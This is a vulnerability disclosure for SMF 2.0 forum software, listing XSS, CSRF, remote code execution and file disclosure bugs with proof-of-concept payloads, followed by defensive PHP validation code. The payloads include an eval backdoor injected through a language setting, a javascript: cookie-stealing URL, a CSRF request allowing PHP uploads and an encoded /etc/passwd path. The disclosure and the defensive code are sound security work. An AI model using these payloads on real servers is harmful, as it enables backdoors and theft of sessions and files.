This is the first batch of vulnerabilities found by the SimpleAudit team from elhacker.net (http://labs.elhacker.net/simpleaudit). Our goal is to evaluate the security of SMF 2.0 before using it on our own server, and we have found several security vulnerabilities. The vulnerabilities that also apply to SMF 1.1.10 were fixed by the SMF team today in SMF 1.1.11; visit simplemachines.org for details. You can review the list of the published vulnerabilities at: http://code.google.com/p/smf2-review/issues/list

Description: XSS in 'website' field in User Profile
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/Profile-Modify.php:802
Vulnerable URL: N/A
PoC: javascript:alert(document.cookie);//http://xx

Description: PHP Remote Code Execution
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/ManageServer.php:1409
Vulnerable URL: Themes/default/languages/index.english.php
PoC: en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //

Description: CSRF theme change
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/Load.php:1245
Vulnerable URL: index.php?theme=2
PoC: N/A

Description: Subforum Category Collapse CSRF
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/BoardIndex.php:130
Vulnerable URL: index.php?action=collapse;c=1;sa=collapse
PoC: N/A

Description: CSRF in package server manager
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/Packages.php:1189
Vulnerable URL: http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1
PoC: N/A

Description: XSS in package server manager
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/PackageGet.php:732
Vulnerable URL: index.php?action=packageget
PoC: "Add server" => Name: XSS

Description: CSRF package deletion and installed package disclosure
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/Packages.php:1189
Vulnerable URL: /index.php?action=admin;area=packages;sa=remove;package=.htaccess
PoC: N/A

Description: Attached files configuration CSRF
Discovered by: WHK@elhacker.net
Vulnerable code: Sources/ManageAttachments.php:117, Sources/ManageAttachments.php:162
Vulnerable URL: /index.php?action=admin;area=manageattachments;sa=attachments
PoC: POST: attachmentEnable=1&attachmentExtensions=com%2Cexe%2Cphp5%2Cphp4%2Cconf%2Ccfg%2Cini%2Chtaccess%2Cphp&attachmentUploadDir=%2Fopt%2Flampp%2Fhtdocs%2Fsmf_2%2Fattachments&attachmentDirSizeLimit=10240&attachmentPostLimit=192&attachmentSizeLimit=128&attachmentNumPerPostLimit=4&attachmentShowImages=1&attachmentThumbnails=1&attachmentThumbWidth=150&attachmentThumbHeight=150

Description: XSS in "Enable basic HTML in posts"
Discovered by: sirdarckcat@elhacker.net
Vulnerable code: N/A
Vulnerable URL: N/A
PoC:

Description: Remote File Disclosure via logs
Discovered by: sirdarckcat@elhacker.net
Vulnerable code: N/A
Vulnerable URL: index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q==
PoC: An attacker who forces that page to render as CSS can read its content.

Description: CSRF in Moderation Preferences
Discovered by: sirdarckcat@elhacker.net
Vulnerable code: N/A
Vulnerable URL: index.php?action=moderate;area=settings
PoC: This action is not protected against CSRF.
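The entries above fall into three classes: a `javascript:` value accepted into a profile URL field, a user-supplied setting spliced into a PHP source file, and state-changing actions reachable without a request token. The following PHP is an added example written for this page; it is not SMF's code and does not reproduce SMF's fix. The function names, the per-session token derivation and the sample inputs are all hypothetical, chosen only to show what a defensive check for each class looks like.

```php
<?php
// Added example, not SMF code: defensive checks for the three bug classes in
// the advisory above. Function names and sample values are hypothetical.

// 1. Profile "website" field: accept only absolute http(s) URLs with a host,
//    so a javascript: value never reaches the rendered href="". The stored
//    value must still be HTML-escaped (htmlspecialchars) on output.
function is_safe_profile_url(string $url): bool
{
    $url = trim($url);
    if ($url === '') {
        return true; // an empty website field is allowed
    }
    // Scheme allowlist first: parse_url() would happily report "javascript"
    // as a scheme, so do not rely on it alone.
    if (!preg_match('#^https?://#i', $url)) {
        return false;
    }
    $parts = parse_url($url);
    return $parts !== false && !empty($parts['host']);
}

// 2. A language setting that the application writes into a PHP source file:
//    escaping quotes is the wrong tool. Allow only a strict identifier shape
//    (no quotes, semicolons or slashes) and only a name that is actually
//    installed, then write it with var_export() rather than string splicing.
function is_valid_language(string $lang, array $installed): bool
{
    return preg_match('/^[a-z0-9_-]{1,32}$/i', $lang) === 1
        && in_array($lang, $installed, true);
}

// 3. CSRF: every state-changing request (theme switch, category collapse,
//    package removal, attachment or moderation settings) must carry a token
//    bound to the session, compared in constant time before the handler acts.
function csrf_token_for_session(string $session_secret): string
{
    return hash('sha256', 'csrf|' . $session_secret);
}

function csrf_token_valid(string $session_secret, ?string $submitted): bool
{
    return $submitted !== null
        && hash_equals(csrf_token_for_session($session_secret), $submitted);
}

// Constructed sample inputs, including the advisory's own website-field payload.
$urls = [
    'http://example.com/~user',
    'javascript:alert(document.cookie);//http://xx',
    'HTTP://EXAMPLE.COM',
    'https://',
];
foreach ($urls as $u) {
    printf("website  %-46s -> %s\n", $u, is_safe_profile_url($u) ? 'accept' : 'reject');
}

$installed = ['english', 'english_utf8', 'spanish_es']; // hypothetical installed set
foreach (['english', "english'; exit; //", 'klingon'] as $l) {
    printf("language %-46s -> %s\n", $l, is_valid_language($l, $installed) ? 'accept' : 'reject');
}

$secret = bin2hex(random_bytes(16)); // per-session secret kept server-side
$token  = csrf_token_for_session($secret);
printf("csrf with token   -> %s\n", csrf_token_valid($secret, $token) ? 'allow' : 'deny');
printf("csrf cross-site   -> %s\n", csrf_token_valid($secret, null) ? 'allow' : 'deny');
printf("csrf wrong token  -> %s\n", csrf_token_valid($secret, str_repeat('0', 64)) ? 'allow' : 'deny');
```

Run it with `php example.php`. The point of the second check is that validation happens on the identifier, not on the quotes around it: once input is restricted to a known set of installed names there is nothing left to escape, and the settings writer can emit the value with `var_export()`. For the CSRF check, a cross-site request from another origin cannot read the victim's token, so a missing or mismatched token is simply refused before any state changes.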